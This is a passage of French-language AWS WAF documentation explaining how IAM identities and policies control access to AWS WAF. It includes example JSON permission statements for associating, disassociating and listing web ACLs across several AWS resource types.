Un *[utilisateur IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)* est une identité qui dispose d’autorisations spécifiques pour une seule personne ou application. Nous vous recommandons d’utiliser ces informations d’identification temporaires au lieu des utilisateurs IAM avec des informations d’identification à long terme. Pour plus d'informations, voir [Exiger des utilisateurs humains qu'ils utilisent la fédération avec un fournisseur d'identité pour accéder à AWS l'aide d'informations d'identification temporaires](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html#bp-users-federation-idp) dans le *guide de l'utilisateur IAM*.

[https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) spécifient une collection d’utilisateurs IAM et permettent de gérer plus facilement les autorisations pour de grands ensembles d’utilisateurs. Pour plus d’informations, consultez [Cas d’utilisation pour les utilisateurs IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/gs-identities-iam-users.html) dans le *Guide de l’utilisateur IAM*.

### Rôles IAM
<a name="security_iam_authentication-iamrole"></a>

Un *[rôle IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)* est une identité dotée d’autorisations spécifiques qui fournit des informations d’identification temporaires. Vous pouvez assumer un rôle en [passant d'un rôle utilisateur à un rôle IAM (console)](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-console.html) ou en appelant une opération AWS CLI ou AWS API. Pour plus d’informations, consultez [Méthodes pour endosser un rôle](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_manage-assume.html) dans le *Guide de l’utilisateur IAM*.

Les rôles IAM sont utiles pour l’accès des utilisateurs fédérés, les autorisations temporaires des utilisateurs IAM, les accès intercompte, les accès entre services et les applications exécutées sur Amazon EC2. Pour plus d’informations, consultez [Accès intercompte aux ressources dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies-cross-account-resource-access.html) dans le *Guide de l’utilisateur IAM*.

## Gestion de l’accès à l’aide de politiques
<a name="security_iam_access-manage"></a>

Vous contrôlez l'accès en AWS créant des politiques et en les associant à AWS des identités ou à des ressources. Une politique définit les autorisations lorsqu'elles sont associées à une identité ou à une ressource. AWS évalue ces politiques lorsqu'un directeur fait une demande. La plupart des politiques sont stockées AWS sous forme de documents JSON. Pour plus d’informations les documents de politique JSON, consultez [Vue d’ensemble des politiques JSON](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html#access_policies-json) dans le *Guide de l’utilisateur IAM*.

À l’aide de politiques, les administrateurs précisent qui a accès à quoi en définissant quel **principal** peut effectuer des **actions** sur quelles **ressources** et dans quelles **conditions**.

Par défaut, les utilisateurs et les rôles ne disposent d’aucune autorisation. Un administrateur IAM crée des politiques IAM et les ajoute aux rôles, que les utilisateurs peuvent ensuite assumer. Les politiques IAM définissent les autorisations quelle que soit la méthode que vous utilisez pour exécuter l’opération.

### Politiques basées sur l’identité
<a name="security_iam_access-manage-id-based-policies"></a>

Les stratégies basées sur l’identité sont des documents de stratégie d’autorisations JSON que vous attachez à une identité (utilisateur, groupe ou rôle). Ces politiques contrôlent les actions que peuvent exécuter ces identités, sur quelles ressources et dans quelles conditions. Pour découvrir comment créer une politique basée sur l’identité, consultez [Définition d’autorisations IAM personnalisées avec des politiques gérées par le client](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create.html) dans le *Guide de l’utilisateur IAM*.

Les politiques basées sur l’identité peuvent être des *politiques intégrées* (intégrées directement dans une seule identité) ou des *politiques gérées (politiques* autonomes associées à plusieurs identités). Pour découvrir comment choisir entre des politiques gérées et en ligne, consultez [Choix entre les politiques gérées et les politiques en ligne](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies-choosing-managed-or-inline.html) dans le *Guide de l’utilisateur IAM*.

### Politiques basées sur les ressources
<a name="security_iam_access-manage-resource-based-policies"></a>

Les politiques basées sur les ressources sont des documents de politique JSON que vous attachez à une ressource. Les exemples incluent *les politiques de confiance de rôle* IAM et les *stratégies de compartiment* Amazon S3. Dans les services qui sont compatibles avec les politiques basées sur les ressources, les administrateurs de service peuvent les utiliser pour contrôler l’accès à une ressource spécifique. Vous devez [spécifier un principal](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_principal.html) dans une politique basée sur les ressources.

Les politiques basées sur les ressources sont des politiques en ligne situées dans ce service. Vous ne pouvez pas utiliser les politiques AWS gérées par IAM dans une stratégie basée sur les ressources.

### Autres types de politique
<a name="security_iam_access-manage-other-policies"></a>

AWS prend en charge des types de politiques supplémentaires qui peuvent définir les autorisations maximales accordées par les types de politiques les plus courants :
+ **Limites d’autorisations** : une limite des autorisations définit le nombre maximum d’autorisations qu’une politique basée sur l’identité peut accorder à une entité IAM. Pour plus d’informations, consultez [Limites d’autorisations pour des entités IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_boundaries.html) dans le *Guide de l’utilisateur IAM*.
+ **Politiques de contrôle des services (SCPs)** — Spécifiez les autorisations maximales pour une organisation ou une unité organisationnelle dans AWS Organizations. Pour plus d’informations, consultez [Politiques de contrôle de service](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) dans le *Guide de l’utilisateur AWS Organizations *.
+ **Politiques de contrôle des ressources (RCPs)** : définissez le maximum d'autorisations disponibles pour les ressources de vos comptes. Pour plus d'informations, voir [Politiques de contrôle des ressources (RCPs)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html) dans le *guide de AWS Organizations l'utilisateur*.
+ **Politiques de session** : politiques avancées que vous passez en tant que paramètre lorsque vous créez par programmation une session temporaire pour un rôle ou un utilisateur fédéré. Pour plus d’informations, consultez [Politiques de session](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html#policies_session) dans le *Guide de l’utilisateur IAM*.

### Plusieurs types de politique
<a name="security_iam_access-manage-multiple-policies"></a>

Lorsque plusieurs types de politiques s’appliquent à la requête, les autorisations en résultant sont plus compliquées à comprendre. Pour savoir comment AWS déterminer s'il faut autoriser une demande lorsque plusieurs types de politiques sont impliqués, consultez la section [Logique d'évaluation des politiques](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html) dans le *guide de l'utilisateur IAM*.

# Comment AWS WAF fonctionne avec IAM
<a name="security_iam_service-with-iam"></a>

Cette section explique comment utiliser les fonctionnalités d'IAM avec AWS WAF.

Avant d'utiliser IAM pour gérer l'accès à AWS WAF, découvrez les fonctionnalités IAM disponibles. AWS WAF






**Fonctionnalités IAM que vous pouvez utiliser avec AWS WAF**  

| Fonctionnalité IAM | AWS WAF soutien | 
| --- | --- | 
|  [Politiques basées sur l’identité](#security_iam_service-with-iam-id-based-policies)  |   Oui  | 
|  [Politiques basées sur les ressources](#security_iam_service-with-iam-resource-based-policies)  |   Oui  | 
|  [Actions de politique](#security_iam_service-with-iam-id-based-policies-actions)  |   Oui  | 
|  [Ressources de politique](#security_iam_service-with-iam-id-based-policies-resources)  |   Oui  | 
|  [Clés de condition de politique (spécifiques au service)](#security_iam_service-with-iam-id-based-policies-conditionkeys)  |   Oui  | 
|  [ACLs](#security_iam_service-with-iam-acls)  |   Non   | 
|  [ABAC (identifications dans les politiques)](#security_iam_service-with-iam-tags)  |   Partielle  | 
|  [Informations d’identification temporaires](#security_iam_service-with-iam-roles-tempcreds)  |   Oui  | 
|  [Transmission des sessions d’accès (FAS)](#security_iam_service-with-iam-principal-permissions)  |   Oui  | 
|  [Rôles de service](#security_iam_service-with-iam-roles-service)  |   Oui  | 
|  [Rôles liés à un service](#security_iam_service-with-iam-roles-service-linked)  |   Oui  | 

Pour obtenir une vue d'ensemble de la façon dont AWS WAF les autres AWS services fonctionnent avec la plupart des fonctionnalités IAM, consultez la section [AWS Services compatibles avec IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-work-with-iam.html) dans le Guide de l'utilisateur *IAM*.

## Politiques basées sur l'identité pour AWS WAF
<a name="security_iam_service-with-iam-id-based-policies"></a>

**Prend en charge les politiques basées sur l’identité :** oui

Les politiques basées sur l’identité sont des documents de politique d’autorisations JSON que vous pouvez attacher à une identité telle qu’un utilisateur, un groupe d’utilisateurs ou un rôle IAM. Ces politiques contrôlent quel type d’actions des utilisateurs et des rôles peuvent exécuter, sur quelles ressources et dans quelles conditions. Pour découvrir comment créer une politique basée sur l’identité, consultez [Définition d’autorisations IAM personnalisées avec des politiques gérées par le client](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create.html) dans le *Guide de l’utilisateur IAM*.

Avec les politiques IAM basées sur l’identité, vous pouvez spécifier des actions et ressources autorisées ou refusées, ainsi que les conditions dans lesquelles les actions sont autorisées ou refusées. Pour découvrir tous les éléments que vous utilisez dans une politique JSON, consultez [Références des éléments de politique JSON IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html) dans le *Guide de l’utilisateur IAM*.

Pour consulter des exemples de politiques AWS WAF basées sur l'identité, consultez. [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md)

## Politiques basées sur les ressources au sein de AWS WAF
<a name="security_iam_service-with-iam-resource-based-policies"></a>

**Prend en charge les politiques basées sur les ressources** : oui

Les politiques basées sur les ressources sont des documents de politique JSON que vous attachez à une ressource. Par exemple, les *politiques de confiance de rôle* IAM et les *politiques de compartiment* Amazon S3 sont des politiques basées sur les ressources. Dans les services qui sont compatibles avec les politiques basées sur les ressources, les administrateurs de service peuvent les utiliser pour contrôler l’accès à une ressource spécifique. Pour la ressource dans laquelle se trouve la politique, cette dernière définit quel type d’actions un principal spécifié peut effectuer sur cette ressource et dans quelles conditions. Vous devez [spécifier un principal](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_principal.html) dans une politique basée sur les ressources. Les principaux peuvent inclure des comptes, des utilisateurs, des rôles, des utilisateurs fédérés ou. Services AWS

Pour permettre un accès intercompte, vous pouvez spécifier un compte entier ou des entités IAM dans un autre compte en tant que principal dans une politique basée sur les ressources. Pour plus d’informations, consultez [Accès intercompte aux ressources dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies-cross-account-resource-access.html) dans le *Guide de l’utilisateur IAM*.

AWS WAF utilise des politiques basées sur les ressources pour favoriser le partage de groupes de règles entre les comptes. Vous partagez un groupe de règles que vous possédez avec un autre AWS compte en fournissant les paramètres de politique basés sur les ressources à l'appel d' AWS WAF API `PutPermissionPolicy` ou à un appel de CLI ou de SDK équivalent. Pour plus d'informations, notamment des exemples et des liens vers la documentation des autres langues disponibles, consultez [PutPermissionPolicy](https://docs.aws.amazon.com/waf/latest/APIReference/API_PutPermissionPolicy.html)la référence de l' AWS WAF API. Cette fonctionnalité n'est pas disponible par d'autres moyens, tels que la console ou CloudFormation. 

## Actions politiques pour AWS WAF
<a name="security_iam_service-with-iam-id-based-policies-actions"></a>

**Prend en charge les actions de politique :** oui

Les administrateurs peuvent utiliser les politiques AWS JSON pour spécifier qui a accès à quoi. C’est-à-dire, quel **principal** peut effectuer **des actions** sur quelles **ressources** et dans quelles **conditions**.

L’élément `Action` d’une politique JSON décrit les actions que vous pouvez utiliser pour autoriser ou refuser l’accès à une politique. Intégration d’actions dans une politique afin d’accorder l’autorisation d’exécuter les opérations associées.



Pour consulter la liste des AWS WAF actions et des autorisations associées à chacune d'elles, reportez-vous à la section [Actions définies par la AWS WAF V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-actions-as-permissions) dans la *référence d'autorisation de service*.

Les actions de politique en AWS WAF cours utilisent le préfixe suivant avant l'action :

```
wafv2
```

Pour indiquer plusieurs actions dans une seule déclaration, séparez-les par des virgules.

```
"Action": [
      "wafv2:action1",
      "wafv2:action2"
         ]
```



Vous pouvez aussi spécifier plusieurs actions à l’aide de caractères génériques (\$1). Par exemple, pour spécifier toutes AWS WAF les actions commençant par`List`, incluez l'action suivante :

```
"Action": "wafv2:List*"
```

Pour consulter des exemples de politiques AWS WAF basées sur l'identité, consultez. [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md)

### Actions nécessitant des paramètres d'autorisation supplémentaires
<a name="security_iam_action-additions"></a>

Certaines actions nécessitent des autorisations qui ne peuvent pas être complètement décrites dans la section [Actions définies par la AWS WAF version 2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-actions-as-permissions) dans la *référence d'autorisation de service*. Cette section fournit des informations supplémentaires sur les autorisations.

**Topics**
+ [Autorisations pour `AssociateWebACL`](#security_iam_action-AssociateWebACL)
+ [Autorisations pour `DisassociateWebACL`](#security_iam_action-DisassociateWebACL)
+ [Autorisations pour `GetWebACLForResource`](#security_iam_action-GetWebACLForResource)
+ [Autorisations pour `ListResourcesForWebACL`](#security_iam_action-ListResourcesForWebACL)

#### Autorisations pour `AssociateWebACL`
<a name="security_iam_action-AssociateWebACL"></a>

Cette section répertorie les autorisations requises pour associer un pack de protection (ACL Web) à une ressource à l'aide de l' AWS WAF action`AssociateWebACL`. 

Pour les CloudFront distributions Amazon, utilisez l'action au lieu de cette CloudFront action`UpdateDistribution`. Pour plus d'informations, consultez [UpdateDistribution](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_UpdateDistribution.html)le manuel *Amazon CloudFront API Reference*. 

**API REST d'Amazon API Gateway**  
Nécessite l'autorisation d'appeler API Gateway `SetWebACL` sur le type de ressource d'API REST et pour appeler AWS WAF `AssociateWebACL` un pack de protection (ACL Web). 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "apigateway:SetWebACL"
    ],
    "Resource": [
        "arn:aws:apigateway:*::/restapis/*/stages/*"
    ]
}
```

**Application Load Balancer**  
Nécessite l'autorisation d'appeler une `elasticloadbalancing:SetWebACL` action sur le type de ressource Application Load Balancer et d'appeler AWS WAF `AssociateWebACL` un pack de protection (ACL Web). 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "elasticloadbalancing:SetWebACL"
    ],
    "Resource": [
        "arn:aws:elasticloadbalancing:*:account-id:loadbalancer/app/*/*"
    ]
}
```

**AWS AppSync API GraphQL**  
Nécessite l'autorisation d'appeler AWS AppSync `SetWebACL` le type de ressource d'API GraphQL et d'appeler AWS WAF `AssociateWebACL` un pack de protection (ACL Web). 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "appsync:SetWebACL"
    ],
    "Resource": [
        "arn:aws:appsync:*:account-id:apis/*"
    ]
}
```

**Groupe d’utilisateurs Amazon Cognito**  
Nécessite l'autorisation d'appeler l'`AssociateWebACL`action Amazon Cognito sur le type de ressource du groupe d'utilisateurs et pour appeler AWS WAF `AssociateWebACL` un pack de protection (ACL Web). 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "cognito-idp:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:cognito-idp:*:account-id:userpool/*"
    ]
}
```

**AWS App Runner service**  
Nécessite une autorisation pour appeler l'`AssociateWebACL`action App Runner sur le type de ressource de service App Runner et pour appeler AWS WAF `AssociateWebACL` une ACL Web. 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "apprunner:AssociateWebAcl"
    ],
    "Resource": [
        "arn:aws:apprunner:*:account-id:service/*/*"
    ]
}
```

**AWS Instance d'accès vérifié**  
Nécessite une autorisation pour appeler l'`ec2:AssociateVerifiedAccessInstanceWebAcl`action sur le type de ressource d'instance Verified Access et pour appeler AWS WAF `AssociateWebACL` une ACL Web. 

```
{
    "Sid": "AssociateWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:AssociateWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "AssociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "ec2:AssociateVerifiedAccessInstanceWebAcl"
    ],
    "Resource": [
        "arn:aws:ec2:*:account-id:verified-access-instance/*"
    ]
}
```

#### Autorisations pour `DisassociateWebACL`
<a name="security_iam_action-DisassociateWebACL"></a>

Cette section répertorie les autorisations requises pour dissocier un pack de protection (ACL Web) d'une ressource à l'aide de l' AWS WAF action`DisassociateWebACL`. 

Pour les CloudFront distributions Amazon, au lieu de cette action, utilisez l' CloudFront action `UpdateDistribution` avec un ID de pack de protection (ACL Web) vide. Pour plus d'informations, consultez [UpdateDistribution](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_UpdateDistribution.html)le manuel *Amazon CloudFront API Reference*. 

**API REST d'Amazon API Gateway**  
Nécessite l'autorisation d'appeler API Gateway `SetWebACL` sur le type de ressource d'API REST. Aucune autorisation n'est requise pour appeler AWS WAF `DisassociateWebACL`.

```
{
    "Sid": "DisassociateWebACL",
    "Effect": "Allow",
    "Action": [
        "apigateway:SetWebACL"
    ],
    "Resource": [
        "arn:aws:apigateway:*::/restapis/*/stages/*"
    ]
}
```

**Application Load Balancer**  
Nécessite l'autorisation d'appeler l'`elasticloadbalancing:SetWebACL`action sur le type de ressource Application Load Balancer. Aucune autorisation n'est requise pour appeler AWS WAF `DisassociateWebACL`.

```
{
    "Sid": "DisassociateWebACL",
    "Effect": "Allow",
    "Action": [
        "elasticloadbalancing:SetWebACL"
    ],
    "Resource": [
        "arn:aws:elasticloadbalancing:*:account-id:loadbalancer/app/*/*"
    ]
}
```

**AWS AppSync API GraphQL**  
Nécessite l'autorisation d'appeler AWS AppSync `SetWebACL` le type de ressource de l'API GraphQL. Aucune autorisation n'est requise pour appeler AWS WAF `DisassociateWebACL`.

```
{
    "Sid": "DisassociateWebACL",
    "Effect": "Allow",
    "Action": [
        "appsync:SetWebACL"
    ],
    "Resource": [
        "arn:aws:appsync:*:account-id:apis/*"
    ]
}
```

**Groupe d’utilisateurs Amazon Cognito**  
Nécessite l'autorisation d'appeler l'`DisassociateWebACL`action Amazon Cognito sur le type de ressource du groupe d'utilisateurs et d'appeler. AWS WAF `DisassociateWebACL` 

```
{
    "Sid": "DisassociateWebACL1",
    "Effect": "Allow",
    "Action": "wafv2:DisassociateWebACL",
    "Resource": "*"
},
{
    "Sid": "DisassociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "cognito-idp:DisassociateWebACL"
    ],
    "Resource": [
        "arn:aws:cognito-idp:*:account-id:userpool/*"
    ]
}
```

**AWS App Runner service**  
Nécessite une autorisation pour appeler l'`DisassociateWebACL`action App Runner sur le type de ressource de service App Runner et pour appeler AWS WAF `DisassociateWebACL`. 

```
{
    "Sid": "DisassociateWebACL1",
    "Effect": "Allow",
    "Action": "wafv2:DisassociateWebACL",
    "Resource": "*"
},
{
    "Sid": "DisassociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "apprunner:DisassociateWebAcl"
    ],
    "Resource": [
        "arn:aws:apprunner:*:account-id:service/*/*"
    ]
}
```

**AWS Instance d'accès vérifié**  
Nécessite une autorisation pour appeler l'`ec2:DisassociateVerifiedAccessInstanceWebAcl`action sur le type de ressource d'instance Verified Access et pour appeler AWS WAF `DisassociateWebACL`. 

```
{
    "Sid": "DisassociateWebACL1",
    "Effect": "Allow",
    "Action": "wafv2:DisassociateWebACL",
    "Resource": "*"
},
{
    "Sid": "DisassociateWebACL2",
    "Effect": "Allow",
    "Action": [
        "ec2:DisassociateVerifiedAccessInstanceWebAcl"
    ],
    "Resource": [
        "arn:aws:ec2:*:account-id:verified-access-instance/*"
    ]
}
```

#### Autorisations pour `GetWebACLForResource`
<a name="security_iam_action-GetWebACLForResource"></a>

Cette section répertorie les autorisations requises pour obtenir le pack de protection (ACL Web) pour une ressource protégée à l'aide de l' AWS WAF action`GetWebACLForResource`. 

Pour les CloudFront distributions Amazon, utilisez l'action au lieu de cette CloudFront action`GetDistributionConfig`. Pour plus d'informations, consultez [GetDistributionConfig](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_GetDistributionConfig.html)le manuel *Amazon CloudFront API Reference*. 

**Note**  
`GetWebACLForResource`nécessite l'autorisation d'appeler`GetWebACL`. Dans ce contexte, il est AWS WAF utilisé `GetWebACL` uniquement pour vérifier que votre compte dispose de l'autorisation dont il a besoin pour accéder au pack de protection (ACL Web) `GetWebACLForResource` renvoyé. Lorsque vous appelez`GetWebACLForResource`, un message d'erreur peut s'afficher indiquant que votre compte n'est pas autorisé à effectuer des opérations `wafv2:GetWebACL` sur la ressource. AWS WAF n'ajoute pas ce type d'erreur à l'historique des AWS CloudTrail événements. 

**API REST Amazon API Gateway, Application Load Balancer et API GraphQL AWS AppSync**  
Nécessite une autorisation pour appeler AWS WAF `GetWebACLForResource` et `GetWebACL` pour obtenir un pack de protection (ACL Web). 

```
{
    "Sid": "GetWebACLForResource",
    "Effect": "Allow",
    "Action": [
        "wafv2:GetWebACLForResource",
        "wafv2:GetWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
}
```

**Groupe d’utilisateurs Amazon Cognito**  
Nécessite l'autorisation d'appeler l'`GetWebACLForResource`action Amazon Cognito sur le type de ressource du groupe d'utilisateurs et d'appeler AWS WAF `GetWebACLForResource` et. `GetWebACL` 

```
{
    "Sid": "GetWebACLForResource1",
    "Effect": "Allow",
    "Action": [
        "wafv2:GetWebACLForResource",
        "wafv2:GetWebACL"
    ],
    "Resource": [ 
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "GetWebACLForResource2",
    "Effect": "Allow",
    "Action": [
        "cognito-idp:GetWebACLForResource"
    ],
    "Resource": [
        "arn:aws:cognito-idp:*:account-id:userpool/*"
    ]
}
```

**AWS App Runner service**  
Nécessite une autorisation pour appeler l'`DescribeWebAclForService`action App Runner sur le type de ressource de service App Runner et pour appeler AWS WAF `GetWebACLForResource` et`GetWebACL`. 

```
{
    "Sid": "GetWebACLForResource1",
    "Effect": "Allow",
    "Action": [
        "wafv2:GetWebACLForResource",
        "wafv2:GetWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "GetWebACLForResource2",
    "Effect": "Allow",
    "Action": [
        "apprunner:DescribeWebAclForService"
    ],
    "Resource": [
        "arn:aws:apprunner:*:account-id:service/*/*"
    ]
}
```

**AWS Instance d'accès vérifié**  
Nécessite l'autorisation d'appeler l'`ec2:GetVerifiedAccessInstanceWebAcl`action sur le type de ressource d'instance Verified Access et d'appeler AWS WAF `GetWebACLForResource` et`GetWebACL`. 

```
{
    "Sid": "GetWebACLForResource1",
    "Effect": "Allow",
    "Action": [
        "wafv2:GetWebACLForResource",
        "wafv2:GetWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "GetWebACLForResource2",
    "Effect": "Allow",
    "Action": [
        "ec2:GetVerifiedAccessInstanceWebAcl"
    ],
    "Resource": [
        "arn:aws:ec2:*:account-id:verified-access-instance/*"
    ]
}
```

#### Autorisations pour `ListResourcesForWebACL`
<a name="security_iam_action-ListResourcesForWebACL"></a>

Cette section répertorie les autorisations requises pour récupérer la liste des ressources protégées pour un pack de protection (ACL Web) à l'aide de l' AWS WAF action`ListResourcesForWebACL`. 

Pour les CloudFront distributions Amazon, utilisez l'action au lieu de cette CloudFront action`ListDistributionsByWebACLId`. Pour plus d'informations, consultez [ListDistributionsByWebACLId](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_ListDistributionsByWebACLId.html)le manuel *Amazon CloudFront API Reference*. 

**API REST Amazon API Gateway, Application Load Balancer et API GraphQL AWS AppSync**  
Nécessite une autorisation AWS WAF `ListResourcesForWebACL` pour appeler une ACL Web. 

```
{
    "Sid": "ListResourcesForWebACL",
    "Effect": "Allow",
    "Action": [
        "wafv2:ListResourcesForWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
}
```

**Groupe d’utilisateurs Amazon Cognito**  
Nécessite l'autorisation d'appeler l'`ListResourcesForWebACL`action Amazon Cognito sur le type de ressource du groupe d'utilisateurs et d'appeler. AWS WAF `ListResourcesForWebACL` 

```
{
    "Sid": "ListResourcesForWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:ListResourcesForWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "ListResourcesForWebACL2",
    "Effect": "Allow",
    "Action": [
        "cognito-idp:ListResourcesForWebACL"
    ],
    "Resource": [
        "arn:aws:cognito-idp:*:account-id:userpool/*"
    ]
}
```

**AWS App Runner service**  
Nécessite une autorisation pour appeler l'`ListAssociatedServicesForWebAcl`action App Runner sur le type de ressource de service App Runner et pour appeler AWS WAF `ListResourcesForWebACL`. 

```
{
    "Sid": "ListResourcesForWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:ListResourcesForWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "ListResourcesForWebACL2",
    "Effect": "Allow",
    "Action": [
        "apprunner:ListAssociatedServicesForWebAcl"
    ],
    "Resource": [
        "arn:aws:apprunner:*:account-id:service/*/*"
    ]
}
```

**AWS Instance d'accès vérifié**  
Nécessite une autorisation pour appeler l'`ec2:DescribeVerifiedAccessInstanceWebAclAssociations`action sur le type de ressource d'instance Verified Access et pour appeler AWS WAF `ListResourcesForWebACL`. 

```
{
    "Sid": "ListResourcesForWebACL1",
    "Effect": "Allow",
    "Action": [
        "wafv2:ListResourcesForWebACL"
    ],
    "Resource": [
        "arn:aws:wafv2:region:account-id:regional/webacl/*/*"
    ]
},
{
    "Sid": "ListResourcesForWebACL2",
    "Effect": "Allow",
    "Action": [
        "ec2:DescribeVerifiedAccessInstanceWebAclAssociations"
    ],
    "Resource": [
        "arn:aws:ec2:*:account-id:verified-access-instance/*"
    ]
}
```

## Ressources politiques pour AWS WAF
<a name="security_iam_service-with-iam-id-based-policies-resources"></a>

**Prend en charge les ressources de politique :** oui

Les administrateurs peuvent utiliser les politiques AWS JSON pour spécifier qui a accès à quoi. C’est-à-dire, quel **principal** peut effectuer **des actions** sur quelles **ressources** et dans quelles **conditions**.

L’élément de politique JSON `Resource` indique le ou les objets auxquels l’action s’applique. Il est recommandé de définir une ressource à l’aide de son [Amazon Resource Name (ARN)](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html). Pour les actions qui ne sont pas compatibles avec les autorisations de niveau ressource, utilisez un caractère générique (\$1) afin d’indiquer que l’instruction s’applique à toutes les ressources.

```
"Resource": "*"
```

Pour voir la liste des types de AWS WAF ressources et leurs caractéristiques ARNs, consultez la section [Ressources définies par la AWS WAF V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-resources-for-iam-policies) dans la *référence d'autorisation de service*. Pour savoir avec quelles actions vous pouvez spécifier l'ARN de chaque ressource, voir [Actions définies par la AWS WAF version 2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-actions-as-permissions). Pour autoriser ou refuser l'accès à un sous-ensemble de AWS WAF ressources, incluez l'ARN de la ressource dans l'`resource`élément de votre politique.

Les ARNs AWS WAF `wafv2` ressources ont le format suivant :

```
arn:partition:wafv2:region:account-id:scope/resource-type/resource-name/resource-id
```

Pour des informations générales sur les spécifications de l'ARN, consultez [Amazon Resource Names (ARNs)](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html) dans le Référence générale d'Amazon Web Services. 

La liste suivante répertorie les exigences spécifiques ARNs aux `wafv2` ressources : 
+ *region*: pour les AWS WAF ressources que vous utilisez pour protéger les CloudFront distributions Amazon, définissez ce paramètre sur`us-east-1`. Sinon, définissez ce paramètre sur la région que vous utilisez avec vos ressources régionales protégées. 
